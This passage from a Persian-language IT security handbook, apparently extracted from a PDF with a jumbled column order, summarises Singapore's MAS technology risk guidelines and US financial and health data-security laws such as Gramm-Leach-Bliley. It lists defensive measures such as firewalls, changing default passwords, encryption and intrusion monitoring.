‫ﻳﻜﺴﺮﻱ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺟﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺩﺭ ﺭﻫﻨﻤﻮﻧﻬﺎﻱ‬
‫ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ‪ ٩٤‬ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ‪.‬‬
‫ﺍﻳﻦ ﺭﻫﻨﻤﻮﻧﻬﺎ ﺑﺪﻧﺒﺎﻝ ﺍﺭﺗﻘـﺎ ﻭ ﺑﻬﺒـﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫـﺎﻱ ﺻـﺤﻴﺢ ﺩﺭ‬
‫ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺭﻭﻳﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩ ﺍﻣـﺎ‬
‫ﺭﻋﺎﻳﺖ ﺁﻥ ﺑﺮﺍﻱ ﻛﺴﻲ ﺍﺟﺒﺎﺭﻱ ﻧﺪﺍﺷﺖ‪ .‬ﺩﺭﻋﻮﺽ ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ‬
‫ﺩﺭ ﺧﻂﻣﺸﻲﻫﺎ ﺫﻛﺮ ﺷﺪﻩ‪" :‬ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺭﻧﺪ ﺍﻳـﻦ‬
‫ﺭﻭﻳﻜﺮﺩﻫــﺎ ﺭﺍ ﺩﺭ ﻧﻈــﺎﺭﺕ ﺑــﺮ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﻓﻨــﺎﻭﺭﻱ ﻭ‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﻭﺍﺭﺩ ﻛﻨﻨـﺪ‪ .‬ﻫـﺮ ﻣﺆﺳـﺴﻪ‬
‫ﺩﺭﺻﻮﺭﺕ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺧﻂﻣـﺸﻲﻫـﺎ ﺍﺯ ﻃـﺮﻑ ‪ MAS‬ﺻـﺎﺣﺐ‬
‫ﻣﻨﺎﻓﻊ ﻭﻳﮋﻩﺍﻱ ﺧﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﺑـﻪ‬
‫ﺗﻼﺵ ﺑﺮﺍﻱ ﻫﻤﺎﻫﻨﮕﻲ ﺑﺎ ﺧﻂﻣﺸﻲﻫﺎ ﺗـﺸﻮﻳﻖ ﺷـﺪﻩﺍﻧـﺪ‪ ".‬ﺍﻳـﻦ‬
‫ﺧﻂﻣﺸﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺑﻪ ﺣـﺴﺎﺏ‬
‫ﺑﻴﺎﻳﻨﺪ‪ .‬ﻓﻬﺮﺳﺖ ﺫﻳﻞ ﺩﺭ ﻣﻮﺭﺩ ﺷﻴﻮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ‬
‫"ﺑﺎﻳﺪ"ﻫﺎﻳﻲ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ‪:‬‬
‫‪٩٣‬‬
‫•‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﺮﻡ ﺍﻓـﺰﺍﺭﻱ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺑﺎﻻﺗﺮﻳﻦ ﺩﺭﺟﺔ ﺍﻣﻨﻴﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺠﻬﺰ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺩﺭ ﺟﻬﺖ‬
‫‪Personal Information Protection And‬‬
‫‪Electronic Documents Act‬‬
‫‪Monetary Authority of Singapore‬‬
‫‪Technology Risk Management Guideline‬‬
‫‪92‬‬
‫‪93‬‬
‫‪94‬‬
‫‪٢٥٣‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺗﻘﻮﻳﺖ‪ ،‬ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺩﻳﮕﺮ ﺍﺯ ﻃﺮﻑ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺳﻴﺴﺘﻢ ﮔﺎﻡ ﺑﺮﺩﺍﺭﻧﺪ؛‬
‫•‬
‫•‬
‫ﺗﻤﺎﻣﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﻭﻟﻴﻪ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺟﺪﻳـﺪ ﺑﺎﻳـﺪ‬
‫ﻓﻮﺭﹰﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻬـﺎﺟﻤﻴﻦ ﺩﺭ‬
‫ﺣﺪ ﻭﺳﻴﻌﻲ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ؛‬
‫•‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ﺑﺎﻳـﺪ ﺩﺭ ﻣﻴـﺎﻥ ﺷـﺒﻜﻪﻫـﺎﻱ ﺩﺍﺧﻠـﻲ ﻭ‬
‫ﺧﺎﺭﺟﻲ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺩﺭ ﻣﻴـﺎﻥ ﭘﺎﻳﮕﺎﻫﻬـﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ‬
‫ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﺠﺰﺍ ﻫﺴﺘﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ؛ ﻭ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻃﺮﺍﺣـﻲ‬
‫ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺎ ﺣــﺴﺎﺳﻴﺖ‪ ،‬ﭘﻴﭽﻴــﺪﮔﻲ‪ ،‬ﻭ ﺣــﻮﺯﺓ ﺗﺄﺛﻴﺮﮔــﺬﺍﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺘﻨﺎﺳﺐ ﻫـﺴﺘﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﻪ ﺩﺳـﺘﺔ‬
‫ﻭﺳﻴﻌﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺑﻜﺎﺭ‬
‫ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺗﺪﺍﺑﻴﺮ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫•‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺑﺎﻳﺪ ﻧﺼﺐ ﻭ ﺍﺟﺮﺍ ﮔﺮﺩﻧﺪ‪.‬‬
‫ﻃﺮﻓـﺪﺍﺭﺍﻥ ﺍﺻـﻠﻲ ﺁﻥ ﺩﺭ ﻛﻨﮕـﺮﻩ‪ ،‬ﻣـﺼﻮﺑﺔ‬
‫•‬
‫ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ‬
‫)ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ(؛‬
‫ﻣﺤﺪﻭﺩﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ؛‬
‫ﺗﻐﻴﻴﺮ ﺭﻭﺍﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ؛‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺍﻟﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻭﮔﺎﻧﻪ )ﺳﻴﺎﺳﺖ ﺟﺪﺍﺳﺎﺯﻱ ﻭﻇﺎﻳﻒ‬
‫ﻭ ﺑﺮﺭﺳــﻲ ﺳــﻮﺍﺑﻖ( ﺑــﺮﺍﻱ ﻛﺎﺭﻣﻨــﺪﺍﻧﻲ ﻛــﻪ ﺑــﻪ ﺍﻃﻼﻋــﺎﺕ‬
‫ﺧﺮﻳﺪﺭﺍﻥ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ؛‬
‫•‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﻧﻔﻮﺫ‪٩٦‬؛‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﻧﻔﻮﺫ‪٩٧‬؛ ﻭ‬
‫•‬
‫ﭘﻴﺶﺑﻴﻨـﻲ ﺗـﺪﺍﺑﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﺨﺮﻳـﺐ‪،‬‬
‫ﺩﺳﺘﻜﺎﺭﻱ‪ ،‬ﻳﺎ ﺣﺬﻑ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ‪.‬‬
‫•‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺩﺭ ﭘﻴﺶ ﮔﺮﻓﺘﻪ ﻛﻪ ﺑﺮ ﻓﺮﺁﻳﻨﺪﻫﺎ‬
‫ﺗﻜﻴﻪ ﺩﺍﺭﺩ ﻭ ﻧﻪ ﺑﺮ ﺷﻴﻮﻩﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗـﺎﻧﻮﻥ‬
‫‪٩٥‬‬
‫ﻣﺪﺭﻥﺳﺎﺯﻱ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ )ﻣـﺼﻮﺏ ﺳـﺎﻝ ‪۱۹۹۹‬؛ ﻛـﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ‬
‫•‬
‫•‬
‫•‬
‫‪Gramm - Leach - Biley‬‬
‫ﺑﺮ ﻣﺒﻨـﺎﻱ ﺍﻳـﻦ ﻗـﺎﻧﻮﻥ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻣـﺼﻮﺏ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫ﻗﺎﻧﻮﻧﮕـﺬﺍﺭ ﺑــﺮﺍﻱ ﺻــﻨﺎﻳﻊ ﺧــﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺗﻮﺳــﻂ ﺑﺎﻧﻜﻬــﺎ ﺍﺟــﺮﺍ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﻗﺎﻧﻮﻥ‪ ،‬ﺍﻗﺪﺍﻣﺎﺕ ﻓﻨﻲ ﻣﻘﺘﻀﻲ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﻲ ﻛﻨﺪ‪ ،‬ﺑﻠﻜﻪ‬
‫ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﺑﺎﺷﺪ‪:‬‬
‫•‬
‫ﻲ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ‬
‫ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟ ﹺ‬
‫ﺍﻓﺸﺎﺳﺎﺯﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ ،‬ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﺗﻐﻴﻴـﺮ ﻭ ﻳـﺎ ﺍﻧﻬـﺪﺍﻡ‬
‫ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺧﺮﻳـﺪﺍﺭﺍﻥ‬
‫ﺍﺳﺖ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ‪.‬‬
‫•‬
‫ﺍﺣﺘﻤﺎﻝ ﻭ ﭘﺘﺎﻧﺴﻴﻞ ﺑﻪ ﻓﻌﻠﻴﺖ ﻧﺮﺳﻴﺪﻥ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺭﺍ ﺑـﺎ‬
‫ﺗﻮﺟﻪ ﺑﻪ ﺣﺴﺎﺳﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﺪ‪.‬‬
‫‪Financial Services Modernization‬‬
‫‪95‬‬
‫•‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺟـﺮﺍﻱ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ‪ .‬ﺑﺮﺭﺳﻲ ﻣﻨﻈﻢ ﺍﻳـﻦ ﻛﻨﺘﺮﻟﻬـﺎ‪،‬‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺣـﺴﺎﺳﻴﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﺗﻬﺪﻳﺪﺍﺕ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ‪ ،‬ﻭ‬
‫ﺗﻐﻴﻴﺮ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﻛـﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﻣﺜـﻞ ﺍﺩﻏـﺎﻡ ﻳـﺎ ﺍﺗﺤـﺎﺩ ﺑـﺎ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ‪ ،‬ﻭ ﻳﺎ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺎﺭﺝ‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫﻴﺄﺕ ﻣﺪﻳﺮﺓ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ‬
‫ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺘﺒﻲ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺭﺍ‬
‫ﺗﺄﻳﻴﺪ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﺮ ﻃﺮﺍﺣﻲ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻃـﺮﺡ )ﺷـﺎﻣﻞ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﻭ ﺑﺮﺭﺳﻲ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ( ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ‪.‬‬
‫ﻗﻮﺍﻧﻴﻦ ﻣﺸﺎﺑﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺗﺠﺎﺭﺕ ﻣﻠﻲ‪ ،‬ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺗﺤـﺖ‬
‫ﻗﻠﻤﺮﻭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻬﻴﺔ ﻃﺮﺣﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺆﺳﺴﺎﺕ‬
‫ﺑﺎﻳﺪ‪:‬‬
‫•‬
‫ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻛﺎﺭﻣﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ؛‬
‫‪Intrusion Monitoring Systems‬‬
‫‪Intrusion Response Programs‬‬
‫‪96‬‬
‫‪97‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ "ﻫﺮ ﻣﺆﺳﺴﻪ ﻣـﺎﻟﻲ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﻣﺪﺍﻭﻣﻲ ﺑﺮﺍﻱ ﺍﺣﺘﺮﺍﻡ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺩﺍﺭﺩ ﻭ‬
‫ﺑﺎﻳﺪ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻭ ﻏﻴﺮﻋﻤـﻮﻣﻲ‬
‫ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪ ".‬ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﺎﻧﻮﻥ‪ ،‬ﮔﺮﺩﺍﻧﻨﺪﮔﺎﻥ‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺗـﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻣـﺪﻳﺮﻳﺘﻲ ﻭ ﻓﻨـﻲ ﻭ‬
‫ﻫﻤﭽﻨــﻴﻦ ﺍﻧﺠــﺎﻡ ﺣﻔﺎﻇــﺖ ﻓﻴﺰﻳﻜــﻲ ﺑــﺮﺍﻱ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ‬
‫ﻣﻲ ﺑﺎﺷﻨﺪ‪ .‬ﻧﻜﺘﻪ ﻣﻬـﻢ ﺍﻳﻨﺠﺎﺳـﺖ ﻛـﻪ ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ ﻣـﺸﺨﺺ‬
‫ﻧﻜﺮﺩﻩﺍﻧﺪ ﻛﻪ ﭼﻪ ﺍﺟﺰﺍﻱ ﻓﻨﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻟﺬﺍ‬
‫ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻗﺎﻧﻮﻥ ﺗﺼﻤﻴﻢ ﺩﺭ ﻣﻮﺭﺩ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺧـﺎﺹ ﺭﺍ‬
‫ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻛﻔﺎﻳــﺖ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ‪ ،‬ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋــﺎﺕ‬
‫ﺧﺮﻳﺪﺍﺭﺍﻥ ﻭ ﺳﺎﻳﺮ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻨﺘﺮﻝ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٥٤‬‬
‫•‬
‫ﺩﺭ ﻫﺮ ﺑﺨﺶ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﻋﻤﻠﻴـﺎﺗﻲ ﺷـﺮﻛﺖ ﻣﺨـﺎﻃﺮﺍﺗﻲ‬
‫ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ ﻣـﺸﺨﺺ ﻭ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺴﺘﻢ ﻛﻨﻮﻧﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ؛‬
‫•‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﻃﺮﺍﺣﻲ ﻭ ﺍﺟﺮﺍ ﻛﻨﻨﺪ ﻭ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ‬
‫ﻣﻨﻈﻢ ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻭ ﺍﺻﻼﺡ ﻗﺮﺍﺭ ﺩﻫﻨﺪ؛‬
‫•‬
‫ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻣﻨﺎﺳﺐ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻭ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﻧﺪ؛ ﻭ‬
‫•‬
‫ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺭﺍ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭﺍﻗﻌﻲ )ﻣﺜﻞ ﺗﻐﻴﻴﺮ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ ﻋﻤﻠﻴـﺎﺕ‬
‫ﺳﺎﺯﻣﺎﻥ( ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺘـﺎﻳﺞ‬
‫ﺁﺯﻣﺎﻳﺶ‪ ،‬ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺭﺍ ﻧﻴﺰ ﺍﺭﺯﻳﺎﺑﻲ ﻭ ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺭﻭﻳﻜﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﻗـﺎﻧﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﺑﻴﻤـﺔ ﺧـﺪﻣﺎﺕ ﺩﺭﻣـﺎﻧﻲ‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‪ ٩٨‬ﺑﻪ ﭼﺸﻢ ﻣـﻲ ﺧـﻮﺭﺩ ﻛـﻪ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ‬
‫ﺑﻬﺪﺍﺷﺘﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﻛﻨﻨﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺑﻴﻤﺎﺭ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤـﻮﺍﺭﻩ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺩﻭﺭ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ‬
‫ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﺪ‪ .‬ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻣﻨﺎﺳﺐ ﻭ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻫﺒﺮﻱ‪ ،‬ﻓﻴﺰﻳﻜﻲ ﻭ ﻓﻨﻲ ﻫﺴﺘﻨﺪ‬
‫ﺗﺎ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﭘﺰﺷـﻜﻲ ﺍﺷـﺨﺎﺹ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺶ ﺑﻴﻨﻲﺷـﺪﻩ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﺣﻔﻆ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻭ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﻋﻤـﺎﻝ‬
